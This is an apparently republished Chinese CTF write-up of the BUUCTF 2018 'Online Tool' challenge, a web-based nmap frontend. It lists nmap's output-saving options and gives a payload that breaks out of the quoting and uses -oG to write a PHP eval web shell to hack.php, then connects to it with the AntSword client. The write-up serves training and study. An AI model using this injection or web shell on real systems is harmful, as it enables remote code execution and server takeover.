BUU-WEB-[BUUCTF 2018]Online Tool

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[BUUCTF 2018]Online Tool相关的知识,希望对你有一定的参考价值。

[BUUCTF 2018]Online Tool

在这里插入图片描述
以get方式传入一个host。
主要功能是一个网页版的nmap。
先测试一下自己的主机。
在这里插入图片描述
查找一下nmap的参数:

-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

以单引号闭合,构建一个一句话木马,通过蚁剑进行连接。
构建的payload为:

/?host='<?php @eval($_POST["cmd"]);?> -oG hack.php '

在这里插入图片描述
上传成功后会有回显地址。
根据地址下的网页,进行蚁剑连接。
在这里插入图片描述
在这里插入图片描述

以上是关于BUU-WEB-[BUUCTF 2018]Online Tool的主要内容,如果未能解决你的问题,请参考以下文章

BUU-WEB-[网鼎杯 2018]Fakebook

BUU-WEB-[HCTF 2018]admin

[BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool

[BUUCTF 2018]Online Tool